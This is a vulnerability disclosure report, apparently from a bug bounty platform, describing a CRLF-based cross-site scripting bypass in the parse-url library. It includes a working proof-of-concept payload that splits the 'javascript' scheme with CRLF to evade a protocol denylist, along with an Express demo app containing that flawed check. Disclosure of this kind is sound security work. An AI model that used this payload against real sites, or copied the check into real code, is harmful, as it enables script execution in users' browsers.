Cross Site Scripting via Improper Input Validation (Based on CRLF) in ionicabizau/parse-url
Valid
Reported on Apr 4th 2022
Description
The parse-url parser (version 6.0.0) does not strip \r and \n characters from the protocol (scheme) portion of a URL. A scheme such as javascript can therefore be split with a CRLF sequence, and any check that compares the parsed protocol against "javascript" is bypassed while the browser still treats the link as a javascript: URL.
Proof of Concept
const parseUrl = require("parse-url");
const express = require("express");
const app = express();

// Payload: the "javascript" scheme is split by a CRLF sequence.
const parsed = parseUrl("jav\r\nascript://%0aalert(1)");
console.log(parsed);

app.get("/", (req, res) => {
  // Intended denylist check: refuse javascript: links.
  // parse-url 6.0.0 reports the protocol as 'jav\r\nascript',
  // so the comparison fails to match and the link is rendered anyway.
  if (parsed.protocol !== "javascript") {
    res.send("<a href='" + parsed.href + "'>CLICK ME!</a>");
  }
});

app.listen(9999);
In general, the above Express code forbids the javascript protocol. However, the check can be spoofed by inserting CRLF characters into the scheme, because the comparison is made against the unsanitized protocol string returned by parse-url.
Output of console.log(parsed):
{
protocols: [ 'jav\r\nascript' ],
protocol: 'jav\r\nascript',
port: null,
resource: '%0aalert(1)',
user: '',
pathname: '',
hash: '',
search: '',
href: 'jav\r\nascript://%0aalert(1)',
query: [Object: null prototype] {}
}
Output: document as rendered in the browser
<a href="jav
ascript://%0aalert(1)">CLICK ME!</a>
Impact
Through this vulnerability, an attacker can get a javascript: link past a protocol denylist and execute arbitrary script in the browser of any user who clicks it.
References
We are processing your report and will contact the ionicabizau/parse-url team within 24 hours.
a year ago
Pocas modified the report
a year ago
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back
a year ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days.
a year ago
We have sent a second follow up to the ionicabizau/parse-url team. We will try again in 10 days.
a year ago
We have sent a third and final follow up to the ionicabizau/parse-url team. This report is now considered stale.
a year ago
Pocas modified the report
a year ago
Pocas modified the report
a year ago
This is a good catch. Thank you very much!
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7